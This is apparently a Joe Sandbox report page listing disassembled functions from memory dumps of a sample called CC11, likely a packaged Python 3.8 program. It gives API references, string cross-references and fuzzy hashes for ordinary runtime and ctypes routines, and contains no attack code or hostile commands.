Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
Instruction ID: 2ae81bc4248d244abe9a45e4bc44f5fc3d06ef8dbb0b98bf6e80129f9962475b
Opcode Fuzzy Hash: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
Instruction Fuzzy Hash: AC112A60E4C647A2F978A33D48555BA2682DF5A370F5847B4D93ECA3DEED2CF4038241

Function 00007FF8BFB80470 Relevance: 7.5, APIs: 5, Instructions: 42COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON38 ref: 00007FF8BFB8048D
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB804AD
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB804CD
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB804ED
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB8050D

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dealloc
String ID:
API String ID: 3617616757-0
Opcode ID: 5eb91d6f8006a15464dad167b52d77913745de2aead0a031361b304b3ea450c4
Instruction ID: 19b753ff147c0abe8d21786f95f75eb6b0352e95203efb16c51708065ed4a929
Opcode Fuzzy Hash: 5eb91d6f8006a15464dad167b52d77913745de2aead0a031361b304b3ea450c4
Instruction Fuzzy Hash: F4113672E06A4285FF949FB988A53B823A0BF94BE9F084230CF0D4A5528F2C9449C310

Function 00007FF6900252B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6900252EC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF690025416
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6900254CC

Strings

verbose, xrefs: 00007FF6900252C0

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction ID: eb54a1ac6184a59909325f8c75781b4a4b7c8bc66e784d2ab2d15e62ae36a6ef
Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction Fuzzy Hash: 8391CF32E08A46A1E7319E39D45037D7395EB44B9AF8841B6DA5DC73D9EF3CE8468304

Function 00007FF69002EED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002F1B7

Part of subcall function 00007FF690026D4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF690026D69

Strings

UTF-16LEUNICODE, xrefs: 00007FF69002F155
UTF-8, xrefs: 00007FF69002F136
ccs, xrefs: 00007FF69002F0F2

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction ID: 5e23132d9c985f3899df5f995a59a8db4605dca690be926f55aa1c8e3b45f56f
Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction Fuzzy Hash: 86817F72E08243E5FB744E3DC2902793AA0EB11B88F5580B5DA09D779EDF2DE9439701

Function 00007FF69001C968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF69001C993
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF69001CA2A
RtlUnwindEx.KERNEL32 ref: 00007FF69001CA84

Strings

csm, xrefs: 00007FF69001CA11

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction ID: fb55907f387caae917aad7023664dd6efa0a123574666d35b35858e6805daa08
Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction Fuzzy Hash: BB51AD32B19646AADBA4CB25E484E797795EB44B8CF548170EA4EC378CEF7DE841C700

Function 00007FF69001E1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF69001E257
_CallSETranslator.LIBVCRUNTIME ref: 00007FF69001E2A3

Strings

MOC, xrefs: 00007FF69001E26B
RCC, xrefs: 00007FF69001E273

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
Instruction ID: 794027cd627189bd3dadbf55c10aea86a09c4ba0f4ab54a2f7751203738c363d
Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
Instruction Fuzzy Hash: AA618332908BC5D6D7719B25E4407AEBBA0FB85798F044265EB9C43B99DF7CE190CB00

Function 00007FF69001E5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF69001E5D0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF69001E6B8

Strings

csm, xrefs: 00007FF69001E5F2
csm, xrefs: 00007FF69001E70A

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction ID: 3fd517f166474d67959c88066563b432a082f811e25dd9fb4666c7e2419afad4
Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction Fuzzy Hash: 11517F36A08382E6EBB48B31944436C7BA0FB65B98F584176DA5D87BD9CF3CE451CB01

Function 00007FF690017530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF69001324C,?,?,00007FF690013964), ref: 00007FF690017642

Strings

%s%c, xrefs: 00007FF6900175B4
\, xrefs: 00007FF6900175A7
%.*s, xrefs: 00007FF6900175FB

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
Instruction ID: c0ecfcf65468bedfb534fe0e40f4d484c8ca3ea1439c6a524bb5eb6e3a5c1f4c
Opcode Fuzzy Hash: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
Instruction Fuzzy Hash: 6C31E82171DAC1A5EA719B34E8507EA6265FB88BE8F404271EE6D837CDDF3CD6418700

Function 00007FF6900125F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9

MessageBoxW.USER32 ref: 00007FF690012686
MessageBoxA.USER32 ref: 00007FF69001269A

Strings

Error, xrefs: 00007FF690012677
Error/warning (ANSI fallback), xrefs: 00007FF69001268E

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error$Error/warning (ANSI fallback)
API String ID: 1878133881-653037927
Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction ID: 33221a58fbb2fdf55098bcd9f466b3ff1a022d4ea694a439cd0533ccf5d5716e
Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction Fuzzy Hash: DE116D72628B85A1EA718B20F451BA93364FB48B88F905175EB5D97788DF7CD605C700

Function 00007FF690012870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9

MessageBoxW.USER32 ref: 00007FF690012906
MessageBoxA.USER32 ref: 00007FF69001291A

Strings

Error/warning (ANSI fallback), xrefs: 00007FF69001290E
Warning, xrefs: 00007FF6900128F7

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error/warning (ANSI fallback)$Warning
API String ID: 1878133881-2698358428
Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction ID: e1d9295304c5a4139dc5b94108194141179b88569957d767db62f109107c1a72
Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction Fuzzy Hash: 98119A72628B85A1EA718B20F451BA93368FB48B88F901176EB8C97748DF3CD609C700

Function 00007FF8BFB7EF98 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON38 ref: 00007FF8BFB7EFC0
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7EFDB

Strings

not a ctype instance, xrefs: 00007FF8BFB7EFCA
can't delete attribute, xrefs: 00007FF8BFB7EFF3

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_StringSubtypeType_
String ID: can't delete attribute$not a ctype instance
API String ID: 468607378-2740123057
Opcode ID: 1fafcbcae81ec3fd018d3d4226a6b337f39236e74224f4e96270f17a336483e8
Instruction ID: 64e050082186bdd3097e9dade199d14b929b3aa92ceb331c33b0e011ea5a9042
Opcode Fuzzy Hash: 1fafcbcae81ec3fd018d3d4226a6b337f39236e74224f4e96270f17a336483e8
Instruction Fuzzy Hash: 50113C62B09B8581EB10CF9AE4800696764FF88FE4B148532EF9D47B69DF3CD491C700

Function 00007FF8BFB71254 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

PyLong_AsUnsignedLongLongMask.PYTHON38 ref: 00007FF8BFB7128B
PyBytes_AsString.PYTHON38 ref: 00007FF8BFB712B3
PyErr_Format.PYTHON38 ref: 00007FF8BFB77041

Strings

bytes or integer address expected instead of %s instance, xrefs: 00007FF8BFB77033

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Long$Bytes_Err_FormatLong_MaskStringUnsigned
String ID: bytes or integer address expected instead of %s instance
API String ID: 1546367030-706233300
Opcode ID: c5b2b3cdae5104d5393cc6efd3c4e60599be666788a45162c92a9ba1b46f74d2
Instruction ID: 196f5e872d13cd96e5e3e21ba8753c732fe00efa2aaffd81e7e8fcc6d1621934
Opcode Fuzzy Hash: c5b2b3cdae5104d5393cc6efd3c4e60599be666788a45162c92a9ba1b46f74d2
Instruction Fuzzy Hash: 2B11D376A1AA46C1EB549F9AE8802783771FB99BD4F148532CB4E83361DE3CE495C300

Function 00007FF8BFB7AA68 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

PySys_Audit.PYTHON38 ref: 00007FF8BFB7AA8E
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7AAB9

Strings

abstract class, xrefs: 00007FF8BFB7AAAF
ctypes.cdata, xrefs: 00007FF8BFB7AA80

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: AuditErr_StringSys_
String ID: abstract class$ctypes.cdata
API String ID: 1384585920-3531133667
Opcode ID: 6c986b24c207993e7dc52169703a89036ea5d551520a2863b80b1632265cef16
Instruction ID: 122a6579531ed1f338c884c537cf13dcc02556c5bd24cba71d61de5db68573f2
Opcode Fuzzy Hash: 6c986b24c207993e7dc52169703a89036ea5d551520a2863b80b1632265cef16
Instruction Fuzzy Hash: 4F011722B19B4281EB44DB9AE9541796BA5FBC8FC4B088035DB4D97765EF2CE455C300

Function 00007FF8BFB719CC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON38(?,?,?,00007FF8BFB719B4), ref: 00007FF8BFB719E5
PyErr_SetString.PYTHON38(?,?,?,00007FF8BFB719B4), ref: 00007FF8BFB77295

Strings

expected CData instance, xrefs: 00007FF8BFB7728B

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_StringSubtypeType_
String ID: expected CData instance
API String ID: 468607378-1581534645
Opcode ID: 18eac365da9da82c7be5fa6ddf0301b549dbff12dc4289c0220c4cf0942324f5
Instruction ID: 705635ad2a164d95a6879a40154b42cdacc466e8848c15e33c706c2d3eb9adea
Opcode Fuzzy Hash: 18eac365da9da82c7be5fa6ddf0301b549dbff12dc4289c0220c4cf0942324f5
Instruction Fuzzy Hash: A3012861A09B0781EB54AFEDD84017837A4FF89BC4B280531CB2E867A1EF3DE596C310

Function 00007FF8BFB74EB4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

PyUnicode_AsUTF8.PYTHON38 ref: 00007FF8BFB74EE9
PyLong_AsUnsignedLongMask.PYTHON38 ref: 00007FF8BFB7961C
PyErr_SetString.PYTHON38 ref: 00007FF8BFB79651

Strings

function name must be string, bytes object or integer, xrefs: 00007FF8BFB79647

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_LongLong_MaskStringUnicode_Unsigned
String ID: function name must be string, bytes object or integer
API String ID: 2115587880-3177123413
Opcode ID: 25a9809bc0b9a84059b6088b3c6c508c1e875b89492b4433713f89c9c7ab522e
Instruction ID: c8fc017e3be139365b0bea0cae146da9e9c582c13729d5b71627d2c5ce603e19
Opcode Fuzzy Hash: 25a9809bc0b9a84059b6088b3c6c508c1e875b89492b4433713f89c9c7ab522e
Instruction Fuzzy Hash: 0101A422B1AB06C1FB195FEED8545793751AF88BD5F048430C64D86B61DE3CA091C300

Function 00007FF8BFB7CE08 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

PySys_GetObject.PYTHON38 ref: 00007FF8BFB7CE3C

Part of subcall function 00007FF8BFB7BE74: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8BFB7BEB1

PyFile_WriteString.PYTHON38 ref: 00007FF8BFB7CE7F
PyErr_Print.PYTHON38 ref: 00007FF8BFB7CE85

Strings

stderr, xrefs: 00007FF8BFB7CE35

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_File_ObjectPrintStringSys_Write__stdio_common_vsprintf
String ID: stderr
API String ID: 3428540488-1769798200
Opcode ID: b85cdcbcb23bfeaac3917966d3ac98d52ea196867f0de5e8bdad10b2158e6464
Instruction ID: ac7831e58251dd5b0c947f43f9f9de7460d34d57c2d0d92651604bae9a8809a1
Opcode Fuzzy Hash: b85cdcbcb23bfeaac3917966d3ac98d52ea196867f0de5e8bdad10b2158e6464
Instruction Fuzzy Hash: E1014C62A29B8182EA608B94F8953A977A4FFD8B80F480135CB8D07356DF3CE155CB40

Function 00007FF8BFB71180 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

PyLong_AsUnsignedLongLongMask.PYTHON38 ref: 00007FF8BFB711AD
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB711B6
PyErr_SetString.PYTHON38 ref: 00007FF8BFB76FED

Strings

cannot be converted to pointer, xrefs: 00007FF8BFB76FE3

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_Long$Long_MaskOccurredStringUnsigned
String ID: cannot be converted to pointer
API String ID: 361506457-3065012988
Opcode ID: 9d78d1695ba62ee1ba72d204a46f331d9aac2d2020aa89fcc41fd74f633a5faa
Instruction ID: f62c2590884e23e79cf2e3fdfc7846c99241360aa872f4a937fcfb7ce0a60c3a
Opcode Fuzzy Hash: 9d78d1695ba62ee1ba72d204a46f331d9aac2d2020aa89fcc41fd74f633a5faa
Instruction Fuzzy Hash: 9301EC25A1EB4685EB548FDDE88437927B0BF88BC5F188131DB4D07765DE2CE498D300

Function 00007FF8BFB7B1DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

PyCallable_Check.PYTHON38 ref: 00007FF8BFB7B1F4
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7B20F
_Py_Dealloc.PYTHON38 ref: 00007FF8BFB7B236

Strings

the errcheck attribute must be callable, xrefs: 00007FF8BFB7B205

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Callable_CheckDeallocErr_String
String ID: the errcheck attribute must be callable
API String ID: 3907376375-3049503998
Opcode ID: 61656c79d6d346c1efe85635cb1e8023004125b6a61a1fa0cb11ab76b3daad86
Instruction ID: b9aae483b674401828b96c2826bf62e92ae74f2a90e84fde41577ae6b447fc59
Opcode Fuzzy Hash: 61656c79d6d346c1efe85635cb1e8023004125b6a61a1fa0cb11ab76b3daad86
Instruction Fuzzy Hash: 86F06232B0AA4691EB58AFADE99017867A0FF88FD4F14C130CB6D87665DF2CD454C700

Function 00007FF8BFB79CE4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON38 ref: 00007FF8BFB79D12
